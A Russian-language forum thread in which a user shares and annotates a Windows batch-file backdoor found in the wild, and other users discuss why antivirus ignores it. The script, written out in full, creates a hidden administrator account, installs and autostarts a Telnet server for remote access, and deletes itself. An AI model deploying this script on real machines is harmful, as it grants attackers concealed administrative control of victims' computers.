Интересный батник

Сообщение **Stinger** » 10 июл 2015, 14:30

Мне попался интересный бэкдор, построен на стандартных средствах Windows. Не знаю, можно ли его назвать в таком случае вирусом, но он позволяет удаленно управлять устройством через протокол Telnet, а точнее получить доступ к терминалу. Также на него не реагируют антивирусы, так как он является пакетным файлом.
Вот сам "вирус":

Код: Выделить всё

1. @echo off 								--  отключение вывода на экран
2. chcp 866 									-- изменение кодировки страницы на 866
3. net user Name Password /add 					-- создание учётной записи для протокола Telnet 
4. net localgroup Ђ¤¬ЁЁбва в®ал Name /add 			-- насколько я понял, это добавление в группу администраторов 
5. net accounts /maxpwage:unlimited 				-- строк действия учётной записи
6. reg add "HKLM\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\
SpecialAccounts\UserList" /v Name /t REG_DWORD /d 0 /f  -- специальная учётная запись 
7. start "" /W pkgmgr /iu: "TelnetServer" 				-- установка службы Telnet
8. ::tlntadmn config port=8080 sec=-NTLM 				--редирект на другой порт (видимо для противостояния роутерам)
9. net localgroup "TelnetClients" Name /add 			--добавление учётки в группу Telnet
10. sc config tlntsvr start = auto 					-- автозапуск
11. net start telnet 								-- запуск службы
12. del %0                                                              		-- самоуничтожение

Рассчитан он на запуск от имени администратора и во время выполнения минуты 2 висит окно cmd. Конечно, это можно "профиксить" с помощью vbs.
И для атаки злоумышленнику нужен IP, так что думаю атака была направленной. Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.

YouTube · Сообщение **DesignerMix** » 10 июл 2015, 15:04

Stinger писал(а): Меня немного расстроило молчание антивируса, так что будьте бдительны и смотрите, что запускаете.

А почему антивирус должен был на него реагировать? Ведь в выполняемых командах нет ничего необычного, например какой-нибудь администратор вполне может написать подобный для удобства подключения к удаленным машинам.

Спасибо за интересную информацию!

Сообщение **c5f** » 10 июл 2015, 20:13

Пользуйтесь linux или не пользуйтесь администраторской учётной записью в windows повсеместно.

Сообщение **Stinger** » 10 июл 2015, 20:59

Stinger писал(а): управлять устройством через протокол Telnet, а точнее получить доступ к терминалу

А я разве писал что это бэкдор для Windows? В UNIX'ах тоже есть Telnet, а вообще протокол создан для удаленного кроссплатформенного управления, так что использование Linux вас не спасёт.

Отправлено спустя 16 минут 1 секунду:
Конечно, именно этот код работать не будет, но всё же его можно переработать и для Linux

Stinger писал(а): Конечно, именно этот код работать не будет, но всё же его можно переработать и для Linux

Stinger писал(а): построен на стандартных средствах Windows

Сообщение **Stinger** » 12 июл 2015, 20:33

Я имел ввиду что можно реализовать "блокнотом", а служба Telnet, через которую и реализуется управление, есть и на линуксе.

Отправлено спустя 1 минуту 20 секунд:
И я же написал что можно написать (переделать) под Linux, так в чём проблема?

Stinger, можно - можно переработать. Никаких проблем)

Denis Akima · Сообщение **Denis Akima** » 08 сен 2015, 13:48

Stinger, можно уточнить четвёртую строку? У меня она некоректно отображается "4. net localgroup Ђ¤¬ЁЁбва в®ал Name /add "

YouTube · Сообщение **DesignerMix** » 08 сен 2015, 14:35

Denis Akima писал(а): Ђ¤¬ЁЁбва в®ал

Здесь написано Администраторы. Автор темы кстати в комментариях к данной строке это и указал -- насколько я понял, это добавление в группу администраторов